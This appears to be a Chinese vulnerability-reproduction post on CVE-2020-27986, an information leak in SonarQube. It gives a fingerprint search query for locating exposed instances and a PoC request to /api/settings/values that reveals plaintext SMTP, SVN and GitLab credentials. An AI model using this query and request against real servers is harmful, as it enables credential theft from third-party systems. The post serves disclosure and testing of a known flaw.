SonarQube values 信息泄露漏洞 #CVE-2020-27986

漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息。

漏洞影响

SonarQube

网络测绘

app=”sonarQube-代码管理”

漏洞复现

主页如下

20240428152916726-1628578104263-4058ad67-3556-4948-bb84-80b780f6a808.f6852e92_2024-04-28_15-29-04 (1)

漏洞POC

http://xxx.xxx.xxx.xxx/api/settings/values

20240428153317652-image-20210627221628431.69ccf9c0_2024-04-28_15-33-04 (1)

可泄露的为:明文SMTP、SVN和Gitlab等敏感信息

20240428153352246-image-20210627221640310.d3740281_2024-04-28_15-33-40 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容